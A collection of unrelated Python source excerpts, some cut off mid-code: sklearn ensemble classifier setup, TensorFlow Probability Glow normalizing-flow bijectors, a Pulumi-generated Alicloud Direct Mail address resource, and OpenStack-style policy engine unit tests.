classifiers['bagging_svc_classifier'] = BaggingClassifier(
base_estimator=SVC(),
n_estimators=100,
random_state=0
)
classifiers['bagging_dt_classifier'] = BaggingClassifier(
base_estimator=DecisionTreeClassifier(random_state=0),
n_estimators=100,
random_state=0
)
classifiers['oneVsRest_classifier'] = OneVsRestClassifier(SVC(), n_jobs=8)
classifiers['gradient_boosting_classifier'] = GradientBoostingClassifier(
n_estimators=100,
learning_rate=0.1,
max_depth=5,
random_state=0
)
return classifiers
def train_models(dtf_e_train, models_to_train):
'''
Train all the models in models, using the data in dtf_e_train.
The models are trained per energy range in dtf_e_train.
Parameters
----------
dtf_e_train: dict of pandas DataFrames
Each entry in the dict is a DataFrame containing the data to train with.
The keys of the dict are the energy ranges of the data.
Each DataFrame is assumed to contain all 'train_features' and 'labels'.
models: a nested dict of models:
1st dict:
keys=model names, values=2nd dict
2nd dict:
'model':dict of sklearn models (as returned from define_regressors/classifiers()).
'train_features': list of variable names to train with.
'labels': Name of the variable used as the labels in the training.
Returns
-------
A nested dictionary trained models, train_features and labels:
1st dict:
keys=model names, values=2nd dict
2nd dict:
keys=energy ranges, values 3rd dict
3rd dict:
'model': trained model for this | |
Args:
input_shape: shape of the input data
grab_after_block: list of floats specifying what fraction of the channels
should exit the network after each glow block.
Returns:
blockwise_splits: the number of channels left, taken, and passed over for
each glow block.
"""
blockwise_splits = []
ngrab, nleave, npass = 0, 0, 0
# Build backwards
for i, frac in enumerate(reversed(grab_after_block)):
nchan = 4**(i + 1) * input_shape[-1]
ngrab = int((nchan - npass) * frac)
nleave = nchan - ngrab - npass
blockwise_splits.append([nleave, ngrab, npass])
# update npass for the next level
npass += ngrab
npass *= 4
return blockwise_splits[::-1]
@property
def blockwise_splits(self):
return self._blockwise_splits
class ExitBijector(composition.Composition):
"""The spatial coupling bijector used in Glow.
This bijector consists of a blockwise bijector of a realNVP bijector. It is
where Glow adds a fork between points that are split off and passed to the
base distribution, and points that are passed onward through more Glow blocks.
For this bijector, we include spatial coupling between the part being forked
off, and the part being passed onward. This induces a hierarchical spatial
dependence on samples, and results in images which look better.
"""
def __init__(self,
input_shape,
blockwise_splits,
coupling_bijector_fn=None):
"""Creates the exit bijector.
Args:
input_shape: A list specifying the input shape to the exit bijector.
Used in constructing the network.
blockwise_splits: A list of integers specifying the number of channels
exiting the model, as well as those being left in the model, and those
bypassing the exit bijector altogether.
coupling_bijector_fn: A function which takes the argument `input_shape`
and returns a callable neural network (e.g. a keras Sequential). The
network should either return a tensor with the same event shape as
`input_shape` (this will employ additive coupling), a tensor with the
same height and width as `input_shape` but twice the number of channels
(this will employ affine coupling), or a bijector which takes in a
tensor with event shape `input_shape`, and returns a tensor with shape
`input_shape`.
"""
parameters = dict(locals())
nleave, ngrab, npass = blockwise_splits
new_input_shape = input_shape[:-1]+(nleave,)
target_output_shape = input_shape[:-1]+(ngrab,)
# if nleave or ngrab == 0, then just use an identity for everything.
if nleave == 0 or ngrab == 0:
exit_layer = None
exit_bijector_fn = None
self.exit_layer = exit_layer
shift_distribution = identity.Identity()
else:
exit_layer = coupling_bijector_fn(new_input_shape,
output_chan=ngrab)
exit_bijector_fn = self.make_bijector_fn(
exit_layer,
target_shape=target_output_shape,
scale_fn=tf.exp)
self.exit_layer = exit_layer # For variable tracking.
shift_distribution = real_nvp.RealNVP(
num_masked=nleave,
bijector_fn=exit_bijector_fn)
super(ExitBijector, self).__init__(
blockwise.Blockwise(
[shift_distribution, identity.Identity()], [nleave + ngrab, npass]),
parameters=parameters,
name='exit_bijector')
@staticmethod
def make_bijector_fn(layer, target_shape, scale_fn=tf.nn.sigmoid):
def bijector_fn(inputs, ignored_input):
"""Decorated function to get the RealNVP bijector."""
# Build this so we can handle a user passing a NN that returns a tensor
# OR an NN that returns a bijector
possible_output = layer(inputs)
# We need to produce a bijector, but we do not know if the layer has done
# so. We are setting this up to handle 2 possibilities:
# 1) The layer outputs a bijector --> all is good
# 2) The layer outputs a tensor --> we need to turn it into a bijector.
if isinstance(possible_output, bijector.Bijector):
output = possible_output
elif isinstance(possible_output, tf.Tensor):
input_shape = inputs.get_shape().as_list()
output_shape = possible_output.get_shape().as_list()
assert input_shape[:-1] == output_shape[:-1]
c = input_shape[-1]
# For layers which output a tensor, we have two possibilities:
# 1) There are twice as many output channels as the target --> the
# coupling is affine, meaning there is a scale followed by a shift.
# 2) The number of output channels equals the target --> the
# coupling is additive, meaning there is just a shift
if target_shape[-1] == output_shape[-1] // 2:
this_scale = scale.Scale(scale_fn(possible_output[..., :c] + 2.))
this_shift = shift.Shift(possible_output[..., c:])
output = this_shift(this_scale)
elif target_shape[-1] == output_shape[-1]:
output = shift.Shift(possible_output[..., :c])
else:
raise ValueError('Shape inconsistent with input. Expected shape'
'{0} or {1} but tensor was shape {2}'.format(
input_shape, tf.concat(
[input_shape[:-1],
[2 * input_shape[-1]]], 0),
output_shape))
else:
raise ValueError('Expected a bijector or a tensor, but instead got'
'{}'.format(possible_output.__class__))
return output
return bijector_fn
class GlowBlock(composition.Composition):
"""Single block for a glow model.
This bijector contains `num_steps` steps of the flow, each consisting of an
actnorm-OneByOneConv-RealNVP chain of bijectors. Use of actnorm is optional
and the RealNVP behavior is controlled by the coupling_bijector_fn, which
implements a function (e.g. deep neural network) to dictate the behavior of
the flow. A default (GlowDefaultNetwork) function is provided.
"""
def __init__(self, input_shape, num_steps, coupling_bijector_fn,
use_actnorm, seedstream):
parameters = dict(locals())
rnvp_block = [identity.Identity()]
this_nchan = input_shape[-1]
for j in range(num_steps): # pylint: disable=unused-variable
this_layer_input_shape = input_shape[:-1] + (input_shape[-1] // 2,)
this_layer = coupling_bijector_fn(this_layer_input_shape)
bijector_fn = self.make_bijector_fn(this_layer)
# For each step in the block, we do (optional) actnorm, followed
# by an invertible 1x1 convolution, then affine coupling.
this_rnvp = invert.Invert(
real_nvp.RealNVP(this_nchan // 2, bijector_fn=bijector_fn))
# Append the layer to the realNVP bijector for variable tracking.
this_rnvp.coupling_bijector_layer = this_layer
rnvp_block.append(this_rnvp)
rnvp_block.append(
invert.Invert(OneByOneConv(
this_nchan, seed=seedstream(),
dtype=dtype_util.common_dtype(this_rnvp.variables,
dtype_hint=tf.float32))))
if use_actnorm:
rnvp_block.append(ActivationNormalization(
this_nchan,
dtype=dtype_util.common_dtype(this_rnvp.variables,
dtype_hint=tf.float32)))
# Note that we reverse the list since Chain applies bijectors in reverse
# order.
super(GlowBlock, self).__init__(
chain.Chain(rnvp_block[::-1]), parameters=parameters, name='glow_block')
@staticmethod
def make_bijector_fn(layer, scale_fn=tf.nn.sigmoid):
def bijector_fn(inputs, ignored_input):
"""Decorated function to get the RealNVP bijector."""
# Build this so we can handle a user passing a NN that returns a tensor
# OR an NN that returns a bijector
possible_output = layer(inputs)
# We need to produce a bijector, but we do not know if the layer has done
# so. We are setting this up to handle 2 possibilities:
# 1) The layer outputs a bijector --> all is good
# 2) The layer outputs a tensor --> we need to turn it into a bijector.
if isinstance(possible_output, bijector.Bijector):
output = possible_output
elif isinstance(possible_output, tf.Tensor):
input_shape = inputs.get_shape().as_list()
output_shape = possible_output.get_shape().as_list()
assert input_shape[:-1] == output_shape[:-1]
c = input_shape[-1]
# For layers which output a tensor, we have two possibilities:
# 1) There are twice as many output channels as inputs --> the coupling
# is affine, meaning there is a scale followed by a shift.
# 2) There are an equal number of input and output channels --> the
# coupling is additive, meaning there is just a shift
if input_shape[-1] == output_shape[-1] // 2:
this_scale = scale.Scale(scale_fn(possible_output[..., :c] + 2.))
this_shift = shift.Shift(possible_output[..., c:])
output = this_shift(this_scale)
elif input_shape[-1] == output_shape[-1]:
output = shift.Shift(possible_output[..., :c])
else:
raise ValueError('Shape inconsistent with input. Expected shape'
'{0} or {1} but tensor was shape {2}'.format(
input_shape, tf.concat(
[input_shape[:-1],
[2 * input_shape[-1]]], 0),
output_shape))
else:
raise ValueError('Expected a bijector or a tensor, but instead got'
'{}'.format(possible_output.__class__))
return output
return bijector_fn
class OneByOneConv(bijector.Bijector):
"""The 1x1 Conv bijector used in Glow.
This class has a convenience function which initializes the parameters
of the bijector.
"""
def __init__(self, event_size, seed=None, dtype=tf.float32, **kwargs):
parameters = dict(locals())
with tf.name_scope('OneByOneConv') as name:
lower_upper, permutation = self.trainable_lu_factorization(
event_size, seed=seed, dtype=dtype)
self._bijector = scale_matvec_lu.ScaleMatvecLU(
lower_upper, permutation, **kwargs)
super(OneByOneConv, self).__init__(
dtype=self._bijector.lower_upper.dtype,
is_constant_jacobian=True,
forward_min_event_ndims=1,
parameters=parameters,
name=name)
def forward(self, x):
return self._bijector.forward(x)
def inverse(self, y):
return self._bijector.inverse(y)
def inverse_log_det_jacobian(self, y, event_ndims=None):
return self._bijector.inverse_log_det_jacobian(y, event_ndims)
def forward_log_det_jacobian(self, x, event_ndims=None):
return self._bijector.forward_log_det_jacobian(x, event_ndims)
@staticmethod
def trainable_lu_factorization(event_size,
seed=None,
dtype=tf.float32,
name=None):
with tf.name_scope(name or 'trainable_lu_factorization'):
event_size = tf.convert_to_tensor(
event_size, dtype_hint=tf.int32, name='event_size')
random_matrix = tf.random.uniform(
shape=[event_size, event_size],
dtype=dtype,
seed=seed)
random_orthonormal = tf.linalg.qr(random_matrix)[0]
lower_upper, permutation = tf.linalg.lu(random_orthonormal)
lower_upper = tf.Variable(
initial_value=lower_upper, trainable=True, name='lower_upper')
# Initialize a non-trainable variable for the permutation indices so
# that its value isn't re-sampled from run-to-run.
permutation = tf.Variable(
initial_value=permutation, trainable=False, name='permutation')
return lower_upper, permutation
class ActivationNormalization(bijector.Bijector):
"""Bijector to implement Activation Normalization (ActNorm)."""
def __init__(self, nchan, dtype=tf.float32, validate_args=False, name=None):
parameters = dict(locals())
self._initialized = tf.Variable(False, trainable=False)
self._m = tf.Variable(tf.zeros(nchan, dtype))
self._s = TransformedVariable(tf.ones(nchan, dtype), exp.Exp())
self._bijector = invert.Invert(
chain.Chain([
scale.Scale(self._s),
shift.Shift(self._m),
]))
super(ActivationNormalization, self).__init__(
validate_args=validate_args,
forward_min_event_ndims=1,
parameters=parameters,
name=name or 'ActivationNormalization')
def _inverse(self, y, **kwargs):
with tf.control_dependencies([self._maybe_init(y, inverse=True)]):
return self._bijector.inverse(y, **kwargs)
def _forward(self, x, **kwargs):
with tf.control_dependencies([self._maybe_init(x, inverse=False)]):
return self._bijector.forward(x, **kwargs)
def _inverse_log_det_jacobian(self, y, **kwargs):
with tf.control_dependencies([self._maybe_init(y, inverse=True)]):
return self._bijector.inverse_log_det_jacobian(y, 1, **kwargs)
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['MailAddressArgs', 'MailAddress']
@pulumi.input_type
class MailAddressArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
sendtype: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a MailAddress resource.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "sendtype", sendtype)
if password is not None:
pulumi.set(__self__, "password", password)
if reply_address is not None:
pulumi.set(__self__, "reply_address", reply_address)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def sendtype(self) -> pulumi.Input[str]:
"""
Account type. Valid values: `batch`, `trigger`.
"""
return pulumi.get(self, "sendtype")
@sendtype.setter
def sendtype(self, value: pulumi.Input[str]):
pulumi.set(self, "sendtype", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="replyAddress")
def reply_address(self) -> Optional[pulumi.Input[str]]:
"""
Return address.
"""
return pulumi.get(self, "reply_address")
@reply_address.setter
def reply_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reply_address", value)
@pulumi.input_type
class _MailAddressState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MailAddress resources.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
:param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if password is not None:
pulumi.set(__self__, "password", password)
if reply_address is not None:
pulumi.set(__self__, "reply_address", reply_address)
if sendtype is not None:
pulumi.set(__self__, "sendtype", sendtype)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="replyAddress")
def reply_address(self) -> Optional[pulumi.Input[str]]:
"""
Return address.
"""
return pulumi.get(self, "reply_address")
@reply_address.setter
def reply_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reply_address", value)
@property
@pulumi.getter
def sendtype(self) -> Optional[pulumi.Input[str]]:
"""
Account type. Valid values: `batch`, `trigger`.
"""
return pulumi.get(self, "sendtype")
@sendtype.setter
def sendtype(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sendtype", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Account Status freeze: 1, normal: 0.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
class MailAddress(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Direct Mail Mail Address resource.
For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
> **NOTE:** Available in v1.134.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.directmail.MailAddress("example",
account_name="<EMAIL>",
sendtype="batch")
```
> **Note:**
A maximum of 10 mailing addresses can be added.
Individual users: Up to 10 mailing addresses can be deleted within a month.
Enterprise users: Up to 10 mailing addresses can be deleted within a month.
## Import
Direct Mail Mail Address can be imported using the id, e.g.
```sh
$ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MailAddressArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Direct Mail Mail Address resource.
For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
> **NOTE:** Available in v1.134.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.directmail.MailAddress("example",
account_name="<EMAIL>",
sendtype="batch")
```
> **Note:**
A maximum of 10 mailing addresses can be added.
Individual users: Up to 10 mailing addresses can be deleted within a month.
Enterprise users: Up to 10 mailing addresses can be deleted within a month.
## Import
Direct Mail Mail Address can be imported using the id, e.g.
```sh
$ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
```
:param str resource_name: The name of the resource.
:param MailAddressArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MailAddressArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MailAddressArgs.__new__(MailAddressArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["password"] = password
__props__.__dict__["reply_address"] = reply_address
if sendtype is None and not opts.urn:
raise TypeError("Missing required property 'sendtype'")
__props__.__dict__["sendtype"] = sendtype
__props__.__dict__["status"] = None
super(MailAddress, __self__).__init__(
'alicloud:directmail/mailAddress:MailAddress',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
reply_address: Optional[pulumi.Input[str]] = None,
sendtype: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None) -> 'MailAddress':
"""
Get an existing MailAddress resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
:param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
:param pulumi.Input[str] reply_address: Return address.
:param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
:param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MailAddressState.__new__(_MailAddressState)
__props__.__dict__["account_name"] = account_name
__props__.__dict__["password"] = password
__props__.__dict__["reply_address"] = reply_address
__props__.__dict__["sendtype"] = sendtype
__props__.__dict__["status"] = status
return MailAddress(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
| |
<gh_stars>1-10
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test of Policy Engine"""
import os
import mock
import six
import six.moves.urllib.parse as urlparse
import six.moves.urllib.request as urlrequest
from essential.config import cfg
from essential.fixture import config
from essential.fixture import lockutils
from essential import jsonutils
from essential import policy
from essential import test
TEST_VAR_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__),
'var'))
ENFORCER = policy.Enforcer()
class MyException(Exception):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class RulesTestCase(test.BaseTestCase):
def test_init_basic(self):
rules = policy.Rules()
self.assertEqual(rules, {})
self.assertIsNone(rules.default_rule)
def test_init(self):
rules = policy.Rules(dict(a=1, b=2, c=3), 'a')
self.assertEqual(rules, dict(a=1, b=2, c=3))
self.assertEqual(rules.default_rule, 'a')
def test_no_default(self):
rules = policy.Rules(dict(a=1, b=2, c=3))
self.assertRaises(KeyError, lambda: rules['d'])
def test_missing_default(self):
rules = policy.Rules(dict(a=1, c=3), 'b')
self.assertRaises(KeyError, lambda: rules['d'])
def test_with_default(self):
rules = policy.Rules(dict(a=1, b=2, c=3), 'b')
self.assertEqual(rules['d'], 2)
def test_retrieval(self):
rules = policy.Rules(dict(a=1, b=2, c=3), 'b')
self.assertEqual(rules['a'], 1)
self.assertEqual(rules['b'], 2)
self.assertEqual(rules['c'], 3)
@mock.patch.object(policy, 'parse_rule', lambda x: x)
def test_load_json(self):
exemplar = """{
"admin_or_owner": [["role:admin"], ["project_id:%(project_id)s"]],
"default": []
}"""
rules = policy.Rules.load_json(exemplar, 'default')
self.assertEqual(rules.default_rule, 'default')
self.assertEqual(rules, dict(
admin_or_owner=[["role:admin"], ["project_id:%(project_id)s"]],
default=[],
))
def test_str(self):
exemplar = """{
"admin_or_owner": "role:admin or project_id:%(project_id)s"
}"""
rules = policy.Rules(dict(
admin_or_owner="role:admin or project_id:%(project_id)s",
))
self.assertEqual(str(rules), exemplar)
def test_str_true(self):
exemplar = """{
"admin_or_owner": ""
}"""
rules = policy.Rules(dict(
admin_or_owner=policy.TrueCheck(),
))
self.assertEqual(str(rules), exemplar)
class PolicyBaseTestCase(test.BaseTestCase):
def setUp(self):
super(PolicyBaseTestCase, self).setUp()
# NOTE(bnemec): Many of these tests use the same ENFORCER object, so
# I believe we need to serialize them.
self.useFixture(lockutils.LockFixture('policy-lock'))
self.CONF = self.useFixture(config.Config()).conf
self.CONF(args=['--config-dir', TEST_VAR_DIR])
self.enforcer = ENFORCER
self.addCleanup(self.enforcer.clear)
class EnforcerTest(PolicyBaseTestCase):
def test_load_file(self):
self.enforcer.load_rules(True)
self.assertIsNotNone(self.enforcer.rules)
self.assertIn('default', self.enforcer.rules)
self.assertIn('admin', self.enforcer.rules)
def test_set_rules_type(self):
self.assertRaises(TypeError,
self.enforcer.set_rules,
'dummy')
def test_clear(self):
# Make sure the rules are reset
self.enforcer.rules = 'spam'
self.enforcer.clear()
self.assertEqual(self.enforcer.rules, {})
def test_rule_with_check(self):
rules_json = """{
"deny_stack_user": "not role:stack_user",
"cloudwatch:PutMetricData": ""
}"""
rules = policy.Rules.load_json(rules_json)
self.enforcer.set_rules(rules)
action = "cloudwatch:PutMetricData"
creds = {'roles': ''}
self.assertEqual(self.enforcer.enforce(action, {}, creds), True)
def test_enforcer_with_default_rule(self):
rules_json = """{
"deny_stack_user": "not role:stack_user",
"cloudwatch:PutMetricData": ""
}"""
rules = policy.Rules.load_json(rules_json)
default_rule = policy.TrueCheck()
enforcer = policy.Enforcer(default_rule=default_rule)
enforcer.set_rules(rules)
action = "cloudwatch:PutMetricData"
creds = {'roles': ''}
self.assertEqual(enforcer.enforce(action, {}, creds), True)
def test_enforcer_force_reload_true(self):
self.enforcer.set_rules({'test': 'test'})
self.enforcer.load_rules(force_reload=True)
self.assertNotIn({'test': 'test'}, self.enforcer.rules)
self.assertIn('default', self.enforcer.rules)
self.assertIn('admin', self.enforcer.rules)
def test_enforcer_force_reload_false(self):
self.enforcer.set_rules({'test': 'test'})
self.enforcer.load_rules(force_reload=False)
self.assertIn('test', self.enforcer.rules)
self.assertNotIn('default', self.enforcer.rules)
self.assertNotIn('admin', self.enforcer.rules)
def test_enforcer_overwrite_rules(self):
self.enforcer.set_rules({'test': 'test'})
self.enforcer.set_rules({'test': 'test1'}, overwrite=True)
self.assertEqual(self.enforcer.rules, {'test': 'test1'})
def test_enforcer_update_rules(self):
self.enforcer.set_rules({'test': 'test'})
self.enforcer.set_rules({'test1': 'test1'}, overwrite=False)
self.assertEqual(self.enforcer.rules, {'test': 'test',
'test1': 'test1'})
def test_enforcer_with_default_policy_file(self):
enforcer = policy.Enforcer()
self.assertEqual(cfg.CONF.policy_file, enforcer.policy_file)
def test_enforcer_with_policy_file(self):
enforcer = policy.Enforcer(policy_file='non-default.json')
self.assertEqual('non-default.json', enforcer.policy_file)
def test_get_policy_path_raises_exc(self):
enforcer = policy.Enforcer(policy_file='raise_error.json')
e = self.assertRaises(cfg.ConfigFilesNotFoundError,
enforcer._get_policy_path)
self.assertEqual(('raise_error.json', ), e.config_files)
def test_enforcer_set_rules(self):
self.enforcer.load_rules()
self.enforcer.set_rules({'test': 'test1'})
self.enforcer.load_rules()
self.assertEqual(self.enforcer.rules, {'test': 'test1'})
class FakeCheck(policy.BaseCheck):
def __init__(self, result=None):
self.result = result
def __str__(self):
return str(self.result)
def __call__(self, target, creds, enforcer):
if self.result is not None:
return self.result
return (target, creds, enforcer)
class CheckFunctionTestCase(PolicyBaseTestCase):
def test_check_explicit(self):
rule = FakeCheck()
result = self.enforcer.enforce(rule, "target", "creds")
self.assertEqual(result, ("target", "creds", self.enforcer))
def test_check_no_rules(self):
cfg.CONF.set_override('policy_file', 'empty.json')
self.enforcer.default_rule = None
self.enforcer.load_rules()
result = self.enforcer.enforce('rule', "target", "creds")
self.assertEqual(result, False)
def test_check_with_rule(self):
self.enforcer.set_rules(dict(default=FakeCheck()))
result = self.enforcer.enforce("default", "target", "creds")
self.assertEqual(result, ("target", "creds", self.enforcer))
def test_check_raises(self):
self.enforcer.set_rules(dict(default=policy.FalseCheck()))
try:
self.enforcer.enforce('rule', 'target', 'creds',
True, MyException, "arg1",
"arg2", kw1="kwarg1", kw2="kwarg2")
except MyException as exc:
self.assertEqual(exc.args, ("arg1", "arg2"))
self.assertEqual(exc.kwargs, dict(kw1="kwarg1", kw2="kwarg2"))
else:
self.fail("enforcer.enforce() failed to raise requested exception")
class FalseCheckTestCase(test.BaseTestCase):
def test_str(self):
check = policy.FalseCheck()
self.assertEqual(str(check), '!')
def test_call(self):
check = policy.FalseCheck()
self.assertEqual(check('target', 'creds', None), False)
class TrueCheckTestCase(test.BaseTestCase):
def test_str(self):
check = policy.TrueCheck()
self.assertEqual(str(check), '@')
def test_call(self):
check = policy.TrueCheck()
self.assertEqual(check('target', 'creds', None), True)
class CheckForTest(policy.Check):
def __call__(self, target, creds, enforcer):
pass
class CheckTestCase(test.BaseTestCase):
def test_init(self):
check = CheckForTest('kind', 'match')
self.assertEqual(check.kind, 'kind')
self.assertEqual(check.match, 'match')
def test_str(self):
check = CheckForTest('kind', 'match')
self.assertEqual(str(check), 'kind:match')
class NotCheckTestCase(test.BaseTestCase):
def test_init(self):
check = policy.NotCheck('rule')
self.assertEqual(check.rule, 'rule')
def test_str(self):
check = policy.NotCheck('rule')
self.assertEqual(str(check), 'not rule')
def test_call_true(self):
rule = mock.Mock(return_value=True)
check = policy.NotCheck(rule)
self.assertEqual(check('target', 'cred', None), False)
rule.assert_called_once_with('target', 'cred', None)
def test_call_false(self):
rule = mock.Mock(return_value=False)
check = policy.NotCheck(rule)
self.assertEqual(check('target', 'cred', None), True)
rule.assert_called_once_with('target', 'cred', None)
class AndCheckTestCase(test.BaseTestCase):
def test_init(self):
check = policy.AndCheck(['rule1', 'rule2'])
self.assertEqual(check.rules, ['rule1', 'rule2'])
def test_add_check(self):
check = policy.AndCheck(['rule1', 'rule2'])
check.add_check('rule3')
self.assertEqual(check.rules, ['rule1', 'rule2', 'rule3'])
def test_str(self):
check = policy.AndCheck(['rule1', 'rule2'])
self.assertEqual(str(check), '(rule1 and rule2)')
def test_call_all_false(self):
rules = [mock.Mock(return_value=False), mock.Mock(return_value=False)]
check = policy.AndCheck(rules)
self.assertEqual(check('target', 'cred', None), False)
rules[0].assert_called_once_with('target', 'cred', None)
self.assertFalse(rules[1].called)
def test_call_first_true(self):
rules = [mock.Mock(return_value=True), mock.Mock(return_value=False)]
check = policy.AndCheck(rules)
self.assertFalse(check('target', 'cred', None))
rules[0].assert_called_once_with('target', 'cred', None)
rules[1].assert_called_once_with('target', 'cred', None)
def test_call_second_true(self):
rules = [mock.Mock(return_value=False), mock.Mock(return_value=True)]
check = policy.AndCheck(rules)
self.assertFalse(check('target', 'cred', None))
rules[0].assert_called_once_with('target', 'cred', None)
self.assertFalse(rules[1].called)
class OrCheckTestCase(test.BaseTestCase):
def test_init(self):
check = policy.OrCheck(['rule1', 'rule2'])
